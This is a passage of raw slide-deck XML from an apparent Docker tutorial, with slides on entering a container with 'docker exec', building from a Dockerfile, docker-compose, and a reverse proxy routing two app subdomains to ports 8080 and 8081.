            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker container exec -it 70fe0e88dce0  bash</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container exec -it 70fe0e88dce0  /bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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198"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1443050"/>
            <a:ext cx="8839201" cy="2941043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p198"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250475" y="608300"/>
            <a:ext cx="85206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920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understand Dockerfile</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307425" y="815825"/>
            <a:ext cx="83187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sz="2300"/>
              <a:t>docker build		                   Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>ocker compose               docker-compose.yml</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263788" y="815825"/>
            <a:ext cx="1759126" cy="1094100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1210" name="Google Shape;1210;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4707" l="9348" r="7773" t="7303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362150" y="731825"/>
            <a:ext cx="978202" cy="1038499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;p199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6410750" y="1909925"/>
            <a:ext cx="80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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1212" name="Google Shape;1212;p199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364113" y="1909925"/>
            <a:ext cx="1558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1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look/Read</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1213" name="Google Shape;1213;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263788" y="3101825"/>
            <a:ext cx="1759126" cy="1094100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="Google Shape;1214;p199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6410750" y="4195925"/>
            <a:ext cx="80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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370575" y="4195925"/>
            <a:ext cx="11916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rPr>
              <a:t>Look</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7660100" y="1770325"/>
            <a:ext cx="1407700" cy="1407700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p199"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1210" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7340351" y="1251075"/>
            <a:ext cx="518100" cy="525900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p199"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1219" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7432123" y="3021699"/>
            <a:ext cx="590100" cy="470700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1220" name="Google Shape;1220;p199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7797825" y="1323925"/>
            <a:ext cx="1191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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1221" name="Google Shape;1221;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7340352" y="205425"/>
            <a:ext cx="1651247" cy="470700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4707" l="9348" r="7773" t="7303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362150" y="3170225"/>
            <a:ext cx="978202" cy="1038499"/>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200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="272550"/>
            <a:ext cx="8520600" cy="768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500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p200"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20470" l="-609" r="2348" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="845875" y="1118525"/>
            <a:ext cx="7613125" cy="3409350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7966950" y="1357575"/>
            <a:ext cx="900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App1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100800" y="3543225"/>
            <a:ext cx="900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App2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8081</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150675" y="2352000"/>
            <a:ext cx="28932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app1.vishalmahawar.shop</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150675" y="4409400"/>
            <a:ext cx="28932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app2.vishalmahawar.shop</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105575" y="516475"/>
            <a:ext cx="8520600" cy="439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t>docker pull,create,start</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100"/>
              <a:t>docker run</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100"/>
              <a:t>docker build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	                Dockerfile</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>ocker-compose  up -d </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>--build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    docker-compose.yml</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238" name="Google Shape;1238;p201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6171950" y="4356000"/>
            <a:ext cx="803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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p201"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213700" y="1323925"/>
            <a:ext cx="1854100" cy="1854100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;p201"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1241" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686700" y="2906775"/>
            <a:ext cx="1398000" cy="790500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p201"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1241" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7062901" y="3205575"/>
            <a:ext cx="419700" cy="491700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7544950" y="971775"/>
            <a:ext cx="1191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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p201"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7340352" y="152400"/>
            <a:ext cx="1651247" cy="470700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p201"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4707" l="9348" r="7773" t="7303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084700" y="3178025"/>
            <a:ext cx="978202" cy="1038499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p201"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135525" y="2460987"/>
            <a:ext cx="1191599" cy="797565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="Google Shape;1246;p201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2231661" y="3162839"/>
            <a:ext cx="807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rPr>
              <a:t>Look</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1247" name="Google Shape;1247;p201"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5593825" y="4131950"/>
            <a:ext cx="490800" cy="172800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1248" name="Google Shape;1248;p201"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512950" y="1807700"/>
            <a:ext cx="3361500" cy="394800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1249" name="Google Shape;1249;p201"/>
